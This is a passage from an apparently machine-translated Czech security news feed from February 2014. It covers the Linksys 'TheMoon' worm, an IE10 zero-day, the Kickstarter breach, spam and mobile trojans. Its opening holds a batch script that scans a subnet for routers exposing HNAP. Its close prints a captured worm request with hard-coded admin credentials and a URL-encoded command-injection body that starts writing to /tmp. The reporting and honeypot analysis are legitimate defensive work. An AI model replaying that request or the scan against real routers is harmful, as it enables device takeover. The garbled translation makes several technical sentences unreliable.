, pokud errorlevel == 1 goto endend
echo Hostitel% 1 HNAP povoleno
: endend
Zabalte to až do FOR / L smyčky "chknet.cmd" naskenovat / 24 subnet:
@ Echo off
REM Syntaxe: chknet.cmd sub.net.address (3 oktety pouze)
echo skenování Síťové% 1,0
k / L%% G IN (1,1,254) DO volejte chkhost% 1%% G.
Spuštěním Najdete zde vše o tomto síti (můj test sítě jen má jeden router jsme se hrát s):
C: \> chknet 192.168.1
Skenování sítě 192.168.1.0
hostitele 192.168.1.1 se HNAP povolen
Ale to je dost hrubá metoda, a to trvá docela dlouho, než pro / 24 podsíti. Existuje jednoduchý nástroj, který bude dělat svou práci? Byl jsem velmi překvapen, když zjistil, že tam nebyl NMAP NSE skript na to .. Nicméně Nessus má mít plugin pro identifikaci HNAP služeb podle Service Detection / HNAP detekce (sahající až do dubna 2011 - http://www.tenable.com/blog/plugin-spotlights-new-nessus-os-identification-plugins )
Jako vždy, na paměti, že skenování infrastrukturu, kterou nevlastníte bez předchozího písemného souhlasu je nezákonné. Tyto metody mají pomoci skenování sítě, které vlastníte a máte oprávnění ke skenování - domácí síť nebo síť v práci například (na vědomí, že stále vyžadují povolení prohledat váš pracovní síť).
Kickstarter přiznal odcizení dat zákazníků
17.2.2014 Kriminalita
Jedna z nejznámějších crowdfundingových služeb oznámila, že kyberzločinci získali uživatelská jména, adresy, telefonní čísla a šifrovaná hesla registrovaných uživatelů.
Službu na pořádání finančních sbírek od jednotlivců používají miliony lidí k získání kapitálu na realizaci kreativních projektů nebo zakládání firem. Představitelé společnosti v sobotu připustili, že se útočníci dostali k části dat o uživatelích, ale že chyba, kterou zneužili, už byla opravena, a k dalším ztrátám dat by tedy již docházet nemělo.
Odcizená hesla jsou sice zašifrovaná, podle oficiálního upozornění je ale může dešifrovat kdokoli s dostatečnými znalostmi a výpočetním výkonem. Kickstarter proto všem uživatelům doporučuje svá hesla změnit. A pro jistotu samozřejmě i ve všech dalších účtech, kde používají stejnou kombinaci přístupového jména a hesla.
Orgány činné v trestním řízení přitom organizaci na únik upozornily již ve středu.
Generální ředitel společnosti Yancey Strickler napsal na oficiální blog: „Útočníci nezískali žádné údaje o platebních kartách. Nemáme žádný důkaz o jakékoli neoprávněné aktivitě s výjimkou dvou účtů Kickstarteru.“ Dodává také, že u nich nebyly uloženy údaje o platebních kartách.
Společnost oznámila, že v posledních dnech posílila zabezpečení a že spolupracuje s orgány činnými v trestním řízení na odhalení pachatelů.
Kickstarter zahájil činnost v roce 2009 jako platforma pro financování různých projektů jako nezávislých filmů, uměleckých vystoupení, počítačových her nebo otvírání restaurací. Dobrovolníci, které vybranému projektu poskytnou své finanční prostředky, často na oplátku dostávají různé ceny, upomínkové předměty, slevy, vstupenky, kredity nebo první exempláře vyvíjených výrobků.
Za necelých 5 let se již tímto způsobem podařilo financovat přes 100 000 projektů v celkové hodnotě dosahující stovek milionů dolarů.
Měsíční červ infikuje směrovače Linksys
17.2.2014 Viry
Množící se červ nazvaný „The Moon“ napadá směrovače Linkys díky zranitelnosti umožňující obejití ověření.
Podle varování, které ve středu vydalo výzkumné středisko ISC (Internet Storm Center), bylo zaznamenáno nekorektní chování směrovačů Linksys řady E1000 a E1200, které prohledávaly okolní adresy IP na otevřené porty 80 a 8080. O den později ISC potvrdilo, že dané modely mohou být napadeny a že se mu podařilo odchytit aktivního červa pomocí svého honeypotu – úmyslně nechráněnému systému fungujícímu jako vábnička.
Útoky jsou výsledkem červa – sebereplikujícího programu, který napadá systém směrovačů Linksys, které pak používá ke skenování internetu a hledání dalších zranitelných zařízení. Podle Johannese Ullricha, vedoucího technologického pracovníka ISC, prozatím není k dispozici přesný seznam všech zranitelných modelů, ale v závislosti na verzi firmwaru mezi nimi určitě jsou E4200, E3200, E3000, E2500, E2100L, E2000, E1550, E1500, E1200, E1000 a E900.
Červ byl pojmenován „The Moon“ protože obsahuje logo Lunar Industrie, fiktivní společnosti z filmu „The Moon“. Jeho útok začíná zadáním adresy URL s příkazy protokolu HNAP (Home Network Administration Protocol), který byl vyvinut společností Cisco a který umožňuje identifikaci, konfiguraci a správu síťových zařízení. The Moon pomocí příkazů HNAP zjistí přesnou verzi modelu a firmwaru daného směrovače a pokud je zařízení zranitelné, pomocí konkrétního skriptu CGI spustí lokální proces.
Název používaného skriptu CGI nebyl uveřejněn, protože umožňuje obejít ověřování. Červ odesílá náhodné přihlašovací údaje, protože je skript vůbec neověřuje a automaticky uznává administrátorská práva klienta. Následuje stažení a spuštění binárního souboru formátu ELF (Executable and Linkable), zkompilovaného pro platformu procesorů MIPS. Kód v souboru obsažený potom prohledává adresy IP na další zařízení a spustí na směrovači server HTTP, ze kterého jsou kopie červa distribuovány na další cíle.
Prozatím není jasné, jaký úkol má malware plnit, některé řetězce v kódu ale naznačují existenci řídícího serveru, který by mohl vznikající botnet ovládat podle nějaké konkrétní strategie. Co se týče obranné strategie, vypnutí vzdálené správy zřejmě u většiny zařízení nebude připadat v úvahu, stejně jako omezení přístupu ke správcovskému rozhraní pouze na ověřenou množinu adres IP. Pro danou verzi červa ovšem stačí změnit číslo portu rozhraní mimo výchozí 80 a 8080, i když samozřejmě nějaká nová verze červa může snadno hledat i na jiných portech. To ovšem na druhé straně znamená více pokusů a větší aktivitu v síti, kterou lze relativně snadno identifikovat.
Firma Linksys, kterou nedávno zakoupila společnost Belkin, si je podle svého mluvčího vědoma zranitelnosti některých řad svých směrovačů a pracuje na novém firmwaru, který by měl chybu odstranit.
FireEye zprávy IE 10 zero-day používán v zalévání otvorů útoku
15.2.2014 Zranitelnosti
Dobří lidé FireEye Labs zanecháno objevu IE 10 zero-day používán v zavlažování díra útoku na porušené serveru ve Spojených státech [1].
FireEye pracujeme spolu s Microsoftem, takže detaily jsou poměrně tenké . Chcete-li citovat ze svého prvního krátkého blogu:
"Je to zbrusu nový zero-day, který se zaměřuje IE 10 uživatelů navštěvující ohrožena webové stránky-klasický drive-by download útoku. Po úspěšném využití, to zero-day attack stáhne XOR kódovaný náklad ze vzdáleného serveru, dekódování a spustit jej . "
Ti, kteří hledají po IE 10 uživatelů chtít dávat pozor na jejich protokoly serveru proxy pro následné na stažení jako potenciální ukazatel.
UPDATE
FireEye poskytly velké množství detailů o útoku ve druhém blogu, který je dobře stojí za přečtení, a dává spoustu ukazatelů kompromisu projet protokolech a filtry:
http://www.fireeye.com/blog/uncategorized/2014/02/operation-snowman-deputydog-actor-compromises-us-veterans-of-foreign-wars-website.html
[1] http://www.fireeye.com/blog/technical/cyber-exploits/2014/02/new-ie-zero-day-found-in-watering-hole-attack-2.html
Skenování činnost pro / Siemens / bootstrapping / JnlpBrowser / rozvoj /
15.2.2014 Bezpečnost
Jeden z našich karet, Mike, napsal s některými neobvyklými hity ve svých internetových protokolů pro / Siemens / bootstrapping / JnlpBrowser / rozvoj / HTTP/1.1, který se zamyšleně sdílené.
První test byl osamělý skenování na 12. února 2014, a poté následovalo tři nové prověřování na 13 únoru 2014.
Skenování IP adresa 194.95.72.110 má název hostitele fb02itsscan.fh-muenster.de, rychlý pohled se zobrazuje webové stránky a webové stránky nabízí toto srdečné přivítání: Vítejte na Univerzitě aplikovaných věd v Münsteru
Takže potenciálně další akademická "studie", který prohledává internet. Každý, kdo má informace o tom, jaké mohou být hledali, nebo v případě, že je připojen k legitimní studie?
Světový pohár: spammeři se zaměřily na branku
15.2.2014 Spam
2014 vidí dvě velké sportovní akce, které se konají: Mistrovství světa ve fotbale v Brazílii a zimní olympijské hry v Soči. V listopadu jsme se zmínili o mailing Využití Světový pohár - podvodníci maskovat svůj podvod jako loterie. V lednu došlo ke zvýšení počtu těchto druhů zásilek. Příběhy používané ve zprávách byly totožné: uživatel byl informován, že on / ona byla vybrána z řad miliony dalších uživatelů jako vítěz loterie s obrovskou cenu. Aby bylo možné žádat o peníze, uživatel měl kontaktovat organizátory pomocí adresy a telefonní čísla poskytovány.
Tělo zprávy je buď prázdný nebo obsahoval jen jedna věta: "Viz přílohu k informacím" nebo "Otevřete přílohu". Obsah přiloženého souboru změněn od zprávy zprávy, stejně jako formát souborů - JPEG, PDF nebo DOC. Soubor obsahoval informace o údajné výhře údajně i měl odkazy na FIFA a mistrovství světa. Podvodníci dokonce šel do problému, včetně oficiální loga a obrázky z obřadu, kdy byla Brazílie získal na mistrovství světa.
Na konci ledna jsme také zjistil mailing s nebezpečnými přílohami, které využívaných na mistrovství světa téma 2014. V falešné dopisy zaslané jménem webu copa2014.gob.br, oficiální kontaktní kanálu brazilské vlády pro akce FIFA, příjemce byl blahopřál k vítězství dvě vstupenky na mistrovství světa. Chcete-li tisknout lístky pryč, uživatel musel kliknout na odkaz ve zprávě. Pokud uživatel spadl na podvod, Trojan-Downloader objevil na zařízení uživatele, které se pak stáhli Worm.VBS.Dinihou.
Červ je nejen slouží ke stažení a spuštění neznámých souborů bez oznámení, ale napadá i připojených USB flash disky. Chcete-li, aby se e-maily se objeví autentičtější podvodníci používají loga Světového poháru a používá to, co se zdá být skutečné adresa v poli odesílatele. Při bližším zkoumání se však, domény. Com se používá a není. Gov, což znamená, že je falešný.
Naši kolegové z Brazílie našli stejné phishing maily. Podvodníci nabídl volné vstupenky na mistrovství světa, svobodné cestování do Brazílie a jiných "dary". Cílem zločinců bylo ukrást osobní údaje uživatele, včetně údajů o jeho / její kreditní karty.
Malé a střední podniky také inzeroval své služby pomocí motivu mistrovství světa, zasílání nabídek pro cut-ceny mobilních služeb v Brazílii.
Čínské továrny nabízeny také případy smartphone s erby světově proslulých fotbalových klubů.
Spammeři využívají významné mezinárodní události z různých důvodů, od jednoduché reklamy vydírat peníze a krást osobní údaje. To je důvod, proč je důležité dávat pozor na e-maily od lidí, které neznáte. Zprávy o tom, že jste vyhráli v loterii nebo nějaké drahé vstupenky jsou s největší pravděpodobností bude po své peníze, nebo se snaží infikovat váš přístroj.
Mobilní podvodníci zaměřují sportovní fanoušky
15.2.2014 Mobil
Olympijské hry jsou obrovská událost. A podvodníci se zřejmě bude snažit využít jejich zájmu. Už jsme psali o "olympijské" spam pošty. Nyní, SMS spammeři se také objevil na scéně.
10. února jsme zaznamenali spam pošty, který údajně vedl k live stream olympijské události:
«Olympic live stream v Soči hxxp :/ / mms **** .ru / olympic.apk»
Pokud se nic netušící uživatel klikne na odkaz, bude Trojan stahovat do jejich zařízení. My odhalit Trojan v otázce, HEUR: Trojan-SMS.AndroidOS.FakeInst.fb.
Pokud je tato Trojan úspěšně stáhne a čluny, se zabývá serveru C & C a přenáší údaje shromážděné na telefonu uživatele, včetně seznamu kontaktů.
Poté se škodlivý program obdrží příkaz poslat SMS zprávu.
Zpráva je odeslána do jedné z největších bank v Rusku a obsahuje textové Balans. Pokud uživatel je klientem banky a používá mobilní bankovní služby, obdrží zprávu s informací o jeho zůstatku na účtu.
Trojan zachytí všechny zprávy a odešle je na server Scammer je. Jako výsledek, trestní skončí s informacemi o bankovním účtu oběti.
Banka terčem útoku nebyl vybrán náhodně - nabízí svým klientům možnost dobití mobilního telefonu účtu z bankovní karty. Tato služba vyžaduje, aby uživatel poslat určitý typ textové zprávy na číslo banky.
Po obdržení příkazů, Trojan odešle textovou zprávu na číslo banky a peníze jsou převedeny z účtu uživatele na účet infikovaného telefonu.
Peníze jsou pak převedeny z telefonu na účty, které patří do podvodníky.
Trojan je ukrást až 10 000 rublů (přibližně 285 dolarů) za den, zatímco všechny zprávy o převody budou skryta od uživatele.
Sociální inženýrství je vždy představuje nebezpečí. Uživatelé by měli být obzvláště opatrní při významných světových událostí. Přinejmenším, vyhnout se kliknutím na odkazy odeslané ve zprávách lidmi, které neznáte. Vždycky je tu riziko, že budete spadnout do pasti a ztratit docela dost peněz.
Aby se minimalizovalo riziko, že budou infikovány mobilní malware, doporučujeme následující:
Nevypínejte režim dodavatele na mobilních zařízeních
Nepoužívejte flag pole "instalovat aplikace z neznámých zdrojů"
Instalujte pouze aplikace z oficiálních kanálů (Google Play, Amazon Store, atd.)
Věnujte pozornost právům požadovaných aplikací během instalace
Pokud soubor požadovaných práv oprávnění neodpovídá určené funkce aplikace, je (např. žádostí hra povolení odesílat SMS zprávy), neinstalujte aplikace
Používejte bezpečnostní software
Absolute Computrace: Často kladené otázky
15.2.2014 IT
V reakci na četné žádosti o komentáře a vysvětlení po naší prezentace na Analyst Summit 2014 Kaspersky Security , vytvořili jsme tuto dotazy některé odpovědi na nejčastěji kladené otázky.
1.. Proč jste se rozhodli rozšířit tento výzkum po prezentaci o Absolute Computrace v roce 2009?
Kaspersky Lab se rozhodl provést úplnou výzkum na toto téma poté, co objevil několik soukromě vlastněné notebooky Kaspersky Lab Bezpečnostní výzkumníci měli Computrace Agent běží bez předchozího povolení. Takové neautorizované aktivace rychle se stal alarmující, když naše reverzní inženýrství odhalila závažné zranitelnosti v Computrace Agent protokolu designu.
Absolute Software Tisková zpráva z roku 2009 tvrdí, že "modulu Computrace BIOS je aktivována při instalaci Absolute Software ze strany našich zákazníků, a nikdy vnuceny jakéhokoliv uživatele. Computrace je navržen tak, aby se aktivuje, deaktivuje, kontrolovány a řízeny zákazníkem pomocí kódovaných kanálů. "
Nicméně, jsme našli stopy nepovolených aktivací na našem hardware. Náš výzkum práce ukazuje, že skutečné verze Computrace Agent nadále používat nešifrované kanály. Vzhledem k této skutečnosti jsme byli schopni provést živé demo na únosu z Computrace Agent na SAS 2014 konferenci.
2. Měli byste se obrátit Absolute Computrace před provedením výzkumu veřejnost?
Oznámený jsme Absolutní software prostřednictvím e-mailu a připojené celého výzkumného papíru návrhu. Zde je screenshot z e-mailové zprávy zaslané na Absolute Software 3. února 2014
Později ten den, kdy jsme obdrželi automatický e-mail z poštovního serveru Absolute Software: "Dodávka se nepodařilo těmto příjemcům nebo distribučním seznamům: security@absolute.com"
Tam byly žádné další chybové zprávy, která znamená, že e-mail by mělo dosáhnout absolutní Software na jiné adresy v seznamu, ale nikdy jsme obdrželi formální odpověď.
3. Jak nedávno byl Computrace Agent variantu budete analyzovat?
Analyzovali jsme několik spustitelných souborů a notebooků v průběhu tohoto výzkumu. Analyzované notebooky jsou zbrusu nové, zakoupené v roce 2012 s top konfigurace jsou k dispozici na trhu, podle majitelů notebooků.
Varianta Computrace Agent jsme použili v našem živém demu byl sestaven v roce 2012:
4. Jak mohu zjistit Computrace v systému?
Nejjednodušší a nejúčinnější způsob, jak je hledat rpcnet.exe proces ve Správci úloh nebo soubor se stejným názvem v adresáři C: \ Windows \ System32 \ adresáře. Pokud nalezeno - jste Computrace aktivován. Pro delší seznam Computrace Agent činnosti naleznete v části Dodatek A naší výzkumné práce.
5. V případě, že uživatelé bez Windows obávat neautorizovaných aktivací Computrace?
Jak nyní, nejsme vědomi EFI firmwaru nebo systému BIOS Volitelné ROMy, které mají spustitelné soubory pro platformy než Windows, což znamená, že agent s krycím nebude nainstalován na oblasti non-Windows. Podrobnosti o tom, jak je agent nainstalován z BIOSu naleznete naši kompletní výzkum papír
6.. Má problémy se zabezpečením Computrace ovlivnit platformy než Windows?
Náš výzkum ukazuje, bezpečnostní chybu v Computrace Agent protokolu designu, což znamená, že teoreticky všechny prostředky na libovolné platformě, může být ovlivněna. Nicméně, jsme potvrdili pouze zranitelnost v agenta Windows.
Jsme si vědomi Computrace produktů pro Mac OS X a Android tablet. Nicméně, my jsme analyzovali protokoly, které používají.
Závažná zero day chyba v Internet Exploreru 10
14.2.2014 Zranitelnosti
Společnost FireEye upozorňuje na to, že útočníci začali aktivně zneužívat zero day zranitelnost v Microsoft Internet Exploreru 10.
Microsoft problém uznal, způsob řešení ale zatím oznámen nebyl. Poslední pravidelná dávka bezpečnostních záplat Microsoftu byla totiž vydána před pouhými 3 dny (únorová sada bulletinů zabezpečení, jako vždy 2. úterý v měsíci). V samotném Internet Exploreru tento balíček opravoval 24 zranitelností, z nichž 15 se týkalo i verze MSIE 10.
FireEye uvádí, že stávající chyba je kritická, protože k instalaci malwaru stačí pouze navštívit podvodný web, uživatel nemusí provádět žádnou další akci (tzv. útok drive-by download) a ze vzdáleného serveru se automaticky stáhne a začne instalovat malware. Použitý exploit dokáže pomocí skriptu v jazyce Flash ActionScript obejít i ochranu ASLR (address space layout randomization, znáhodnění adresního prostoru) ve Windows.
Podíl uživatelů Internet Exploreru 10 po vydání verze 11 klesá, statisticky společnosti Net Applications ale stále uvádějí, že ho má asi 16 % všech uživatelů MSIE (s 37% podílem převažuje verze 8, která je jako poslední k dispozici pro Windows XP).
Facebook chyba brání zrušení app oprávnění
13.2.2014 Sociální sítě
Vývojáři pracující pro MyPermissions dodavatelů soukromí software tvrdí, že objevili kritickou zranitelnost ve Facebooku kódu. chyba může být zneužita, aby bylo možné pro uživatele zrušit oprávnění uvedené na aplikaci nebo jej odstranit pomocí svých mobilních aplikací Facebook. Uživatelé, kteří se pokusí to se potýkají s chybové obrazovky a zabránit pokračování procesu:
"Skoro každý s trochou technického know-how by, aby to pro vás nemožné odvolat souhlas app, aby přístup k informacím," společnost poukázal . chyba se týká pouze mobilní aplikace Facebooku, takže výše uvedené změny mohou být provedeny přes desktop verzi webu. ale pokud vezmete v úvahu skutečnost, že téměř polovina uživatelů sociální sítě jsou to přístupem výhradně prostřednictvím svých mobilních telefonů, můžete vidět, proč to může být problém. Společnost upozornila Facebook, aby existence vady, a jsou zřejmě již pracuje na opravě.
Mobilita je nejslabší zabezpečení odkaz
13.2.2014 Mobil
Geodetické více než 750 rozhodovací zabezpečení tvůrci a odborníky z praxe, CyberEdge Group zpráva zjistila, že více než 60 procent bylo porušeno v roce 2013 čtvrtina všech účastníků s odkazem na nedostatek investic zaměstnavatele v adekvátní ochrany. Klíčová zjištění patří: zájem o mobilní zařízení. Účastníci byli požádáni, aby sazby - na stupnici od 1 do 5, kde 5 je nejvyšší - schopnost jejich organizace na obranu kybernetickým hrozbám přes devět IT domény. Mobilní zařízení (2.77) obdržel nejnižší známky, následuje notebooky (2,92) a aplikacím pro sociální média (2,93). Virtuální servery (3.64) a fyzické servery (3.63) byly považovány za nejbezpečnější. The BYOD invaze. Od roku 2016, 77 procent v reakci organizací ukazují, že budou mít politiky BYOD na místě. 31 procent již zavedly politiky BYOD, bude 26 procent následovat do 12 měsíců, a dalších 20 procent bude následovat během dvou let. Nepřiměřené investice do zabezpečení. Ačkoli 89 procent z bezpečnostních IT rozpočtů respondentů roste (48 procent), nebo drží stabilní (41 procent), jeden ze čtyř pochybnosti, zda jejich zaměstnavatel investoval dostatečně v kybernetické obrany hrozeb. Lepší zabezpečení, nebo zbožné přání? Přestože 60 procent dotázaných se přiznala k ovlivnění úspěšný kybernetický útok v roce 2013, pouze 40 procent očekávají, že obětí znovu 2014. Next-gen firewally na vzestupu. z 19 určených pro zabezpečení sítě technologií, firewallů příští generace (29%) jsou nejčastěji citován pro budoucí akvizice, následuje analýza chování sítě (26%) a velkých analýzy bezpečnostních dat (24 %). Malware a phishing způsobit bolest hlavy. Z osmi určených kategoriích kybernetických hrozeb, malware a phishing / spear-phishing jsou top mysli a představují největší hrozbu pro reakci organizace. Denial-of-Service (DoS) útoky jsou nejmenší obavy. Nevědomost je sladká. Méně než polovina (48 procent) dotazovaných organizací provádět kompletní síťové skenování aktivní zranitelnosti častěji než jednou za čtvrt roku, zatímco 21 procent provádět pouze jim ročně. Nespokojenost s koncovými obrany. Více než polovina respondentů uvedla svůj záměr posoudit alternativní koncových anti-malware řešení buď rozšířit (34 procent), nebo nahradit (22 procent) jejich stávající software pro ochranu koncových bodů. Careless zaměstnanci jsou na vině. Když se zeptal, které faktory brání zabezpečení IT organizace z dostatečně bránit kybernetickým hrozbám, "nízký povědomí o bezpečnosti mezi zaměstnanci" byl nejčastěji citován, těsně před "nedostatek rozpočtu."
Co si bezpečnostní profesionálové vládní myslíte?
13.2.2014 Bezpečnost
Tripwire a vláda Technology Research Alliance (GTRA) vyhlášeny výsledky kybernetické průzkumu americká vláda, která hodnotila postoje a odezvy 111 bezpečnosti a shody odborníků z US vládních agentur a dodavatelů. "Cybersecurity i nadále jednou z hlavních priorit senior manažeři ve federální vládě, "řekl Ron Ross, pracovník v Národním institutu pro standardy a technologie (NIST). ". Studie, jako je tento, spojit důležité datové body, které vám pomohou s rozhodovací pravomocí posoudit trendy a podílet se na probíhajícím dialogu, který nám pomůže sestavit efektivní řešení pro naše obtížných a náročných problémů kybernetické bezpečnosti" Klíčová zjištění patří:
60 procent věří, že nový rámec NIST zlepší bezpečnost.
55 procent věří, že bezpečnost IT vláda zlepšila v důsledku politiky Bushovy administrativy.
46 procent tvrdí, že viděli snížení rizika v důsledku pokračujícího úsilí sledování.
43 procent z bezpečnosti IT a zaměstnanci shody v úvahu špatnou správu věcí veřejných a dysfunkční kongres "největší bezpečnostní hrozba čelíme."
45 procent respondentů věří, že financování je největším problémem jejich organizace čelí při úspěšném provádění kybernetické programů, pouze 37 procent věří, že mají dostatečné prostředky k řádnému provádění politiky, a když se zeptal, co federální bezpečnostní lídři by měli dělat pro připojení bezpečnosti agentuře poslání, druhá nejpopulárnější odpověď byla "více peněz."
Bere na vědomí, Dwayne Melancon, technologický ředitel společnosti Tripwire: "Je povzbudivé, že bezpečnostní vláda a dodržování profesionálové vidí výhody kontinuální sledování a že jsou optimističtí ohledně budoucího zlepšení prostřednictvím nového rámce NIST však, že výsledky průzkumu zdůrazňují skutečnost, že omezení zdrojů jsou významným inhibitorem silnější zabezpečení ". Melancon pokračoval: "Bohužel se zdá, že agentury stále obávají auditor více než protivník. Jejich největší starostí je stále vyhovující, a zároveň dodržování může pomoci zlepšit zabezpečení, to není nejvýznamnější hrozbu pro dosažení poslání pro většinu organizací.
Trendy v oblasti bezpečnosti webových aplikací
13.2.2014 Bezpečnost
Přes webové aplikace prodejci jsou vstřícnější a uvolnění bezpečnostní záplaty mnohem rychlejší než v roce 2012, nový výzkum ukázal, že je stále přijímá v průměru přes dva týdny pro kritické zranitelnosti, které mají být opraveny. Průměr propojovacích časy v roce 2013 oproti roku 2012:
Ilia Kolochenko, generální ředitel společnosti High-Tech mostu, řekl: "11 dnů na opravu kritické zranitelnosti je ještě poměrně dlouhá prodleva. Ale, naštěstí, i když vážné zranitelnosti jsou stále složitější odhalit a využít, existují dodavatelé, jako například BigTree CMS, kteří reagují na to i komplexní zabezpečení v méně než tři hodiny, takže naše ocenění pro nejcitlivější dodavatel roku 2013 pokračuje k této organizaci. Obecné povědomí ve dodavatelů o důležitosti zabezpečení aplikací je také roste s prodejci konečně brát bezpečnost vážně. V minulosti, dokonce i dobře známých výrobců odloženo související s bezpečností opravy ve prospěch uvolnění nové verze svého softwaru s novými funkcemi a neopravených zranitelností. Nicméně, v roce 2013, žádný velký prodejce přijala tento nebezpečný přístup upřednostňování funkčnosti při obětování bezpečnosti a pouze tři z 62 bezpečnostních rad vydaných u nás v roce 2013 zůstal unpatched. " Navzdory lepším kódovacích praktik dělat vážné zranitelnosti ve vyspělých aplikací těžší najít, výzkumných také celou řadu případů, kdy byla bezpečnostní aplikace postižena základních chyb, jako je nedostatek odstranit instalační skripty, což umožňuje počítačoví zločinci kompromitovat celou webovou aplikaci. To podtrhuje důležitý nezávislého testování bezpečnosti a auditů webových aplikací, jako i profesionální vývojáře může prostě vynechat nebo zapomenout na kontrolu životně důležité bezpečnostní body. Kritické a vysoce rizikových zranitelností jsou stále důmyslnější jak rozpoznat a využít. Pryč jsou dny, kdy se mnoho PHP aplikací běžně používá "exec ()" nebo "průchozí ()" funkce s uživatelem zadané vstupy, které vedou ke vzdálenému spuštění kódu. Závažné zranitelnosti jsou nyní využitelné přes zřetězené útoků a dobrých příkladů, které ilustrují to jsou Vzdálené spuštění kódu v Microweber a OS Command Injection v CosCms. SQL injekce zranitelnosti jsou také stále složitější využívat. Účinné DNS exfiltrace technika je nyní běžně používá v případech, které v minulosti byly považovány za téměř unexploitable k extrakci dat z databáze. Je také důležité zmínit, že mnohé z těchto chyb zabezpečení se obvykle považují za vysokou nebo kritickou riziko bylo sníženo na střední riziko v našich rad v roce 2013, protože jejich využití vyžaduje, aby útočník být ověřen nebo přihlášené. . To potvrzuje, že weboví vývojáři by měli také věnovat pozornost zabezpečení částech žádosti, které jsou přístupné pouze na "důvěryhodných" osob, které se mohou ve skutečnosti být docela nepřátelský " Nejzranitelnější webové aplikace jsou:
In-house webová aplikace, na 40 procent
Pluginy a moduly CMS, na 30 procent
Malé CMS, na 25 procent
Velký CMS, jako je WordPress a Joomla), na 5 procent.
Marsel Nizamutdinov, vedoucí výzkumu v High-Tech mostu, dospěl k závěru: "Je důležité říci, že asi 90 procent velkých a středně velké komerční a open-source CMS náchylné k XSS a SQL injection útoky jsou zranitelné, protože nejsou up-to-data, nebo jsou nesprávně nakonfigurovány. Nicméně, jsme udělali velký pokrok, pokud jde o pozitivním dopadu náš výzkum přináší do průmyslu, s desítkami tisíc populárních internetových stránek již při riziku ohrožení díky našemu úsilí a spolupráci s dodavateli softwaru.
Microsoft, aby se příští Patch Tuesday světlo
13.2.2014 Zranitelnosti
Microsoft pokračuje v trendu, že začal minulý měsíc, jak udržet Patch Tuesday poměrně lehký. Existuje pouze pět návěstí tento měsíc -. Dvě kritické, tři důležité dva kritické informační zprávy jsou neobvyklé v tom, že se nedotýkaly starší verze systému Windows nebo Internet Explorer. První záplaty vzdálené spuštění kódu, který ovlivňuje Windows 7 až po Windows 8.1, včetně 8.1 RT. Druhý, rovněž vzdálené spuštění kódu, je vlastně otázkou Forefront Protection for Exchange Server (2010). Vzhledem k tomu, umožňující vzdálené spuštění kódu v obvodové služby, jako Forefront, musel bych říci, že je to nejvyšší otázka tato priorita záplatování měsíc. Druhá je, není divu, kritická ve Windows 7 a později. Ostatní tři otázky jsou všechny nižší riziko a pravděpodobně nižší exploitability, od zveřejňování informací na odmítnutí služby a zvýšení úrovně oprávnění. Nesmí být ignorovány, ale měla by být poněkud menší obavy než dálkové kritické zranitelnosti. Autor: Ross Barrett, Senior Manager, bezpečnostní inženýrství, Rapid7.
99,4% spamu zablokována v nedávném testu Virus Bulletinu
13.2.2014 Spam
Virus Bulletin oznámila výsledky svého nejnovějšího anti-spam srovnávací hodnocení: všech 18 řešení, které byly testovány byly nalezeny blokovat nejméně 99,4% veškeré nevyžádané pošty - i když někteří bojovali s falešně pozitivní záležitostí.
. Se VBSpam testy nejsou jen podívat na "schopnost, aby se zabránilo spamu v tom, aby ji uživatelů produktů schránek, ale také měří, jak dobře produktů provést, pokud jde o to blokuje legitimní e-maily Tam, výsledky byly spíše smíšené vaku: pět řešení ani blokovat žádné legitimní e-maily vůbec - a jak se také blokována více než 99,5% veškeré nevyžádané pošty, které byly uděleny v VBSpam + ocenění. Nicméně, pro tři řešení, množství legitimní e-mail, že zablokoval byla tak vysoká, že se jim nepodařilo dosáhnout certifikace VBSpam. "Byl jsem opravdu rád, takové ceny odlovu vysoké spam," řekl Anti-Spam test ředitel VB, Martijn Grooten. ".. Stále existují miliardy nevyžádaných e-mailů každý den poslal, z nichž mnozí přicházejí s nebezpečným nákladem Je dobré vědět, že téměř všechny z nich jsou zastaveny dříve, než se dostanou do složky Doručená pošta uživatele" Grooten pokračoval: "Samozřejmě, že to bylo zklamáním vidět, že u některých výrobků, vysoká míra úlovek přišli za cenu blokování docela málo legitimní e-maily. Doufáme, že tyto produkty budou vidět jejich výkon zlepšit v dalším testu. " Zpráva také průzkum využívání účastníků z DMARC. DMARC je specifikace určena k zabránění zneužití e-mailu: umožňuje majitelé často zfalšovaných domén, jaké přijímače dělat s e-maily, které nejsou SPF a DKIM kontroly. Zatímco většina zúčastněných produktů zkontrolovat stav SPF a DKIM podpis příchozích e-mailů , v současné době velmi málo využívají DMARC: pouze jeden ze 18 produktů posílá zpětnou vazbu, zatímco jiný kontroluje stav DMARC příchozích e-mailů, ale neodešle zpětnou vazbu.
Linksys Worm ("TheMoon") Zajatý
13.2.2014 Viry
Jedna důležitá aktualizace: Toto ovlivní další směrovače Linksys stejně. Například, my nějaké směrovače conecting na honeypot kteří se identifikují jako E2500 (Firmware 1.0.03 build 4)
Nakonec naše honeypot to něco, co vypadá, že je zodpovědný za skenování činnost vidíme zachytit:
Původní žádost, jak je popsáno výše, je:
GET / HNAP1 / HTTP/1.1
Host: [ip hostitele]: 8080
Další požadavek je místo, kde to začíná být zajímavé:
POST / [odepřena]. Cgi HTTP/1.1
Host: [IP honeypot]: 8080
User-Agent: Mozilla/4.0 (compatible; MSIE 4.01, Mac_PowerPC)
Přijmout: text / html, application / xhtml + xml, application / xml; q = 0,9, * / *, q = 0,8
Accept-Language: en-US, en, q = 0,5
Accept-Encoding: gzip, deflaci
Referer: http:// [IP honeypot]: 8080 /
Autorizace: Základní YWRtaW46JmkxKkBVJDZ4dmNH <- uživatelské jméno: admin heslo: & i1 * @ U $ 6xvcG
(Stále snaží přijít na význam tohoto hesla)
Připojení: keep-alive
Content-Type: application / x-www-form-urlencoded
Content-Length: 518
% 73% 75% 62% 6d% 69% 74% 5f% 62% 75% 74% 74% 6f% 6e% 3d &% 63% 68% 61% 6e% 67% 65% 5f% 61% 63
% 74% 69% 6f% 6e% 3d &% 73% 75% 62% 6d% 69% 74% 5f% 74% 79% 70% 65% 3d &% 61% 63% 74% 69% 6f
% 6e% 3d &% 63% 6f% 6d% 6d% 69% 74% 3d% 30 &% 74% 74% 63% 70% 5f% 6e% 75% 6d% 3d% 32 &% 74% 74
% 63% 70% 5f% 73% 69% 7a% 65% 3d% 32 &% 74% 74% 63% 70% 5f% 69% 70% 3d% 2d% 68% 20% 60% 63
% 64% 20% 2f% 74% 6d% 70% 3b% 69% 66% 20% 5b% 20% 21% 20% 2d% 65% 20% 2e% 4c% 32% 36% 20
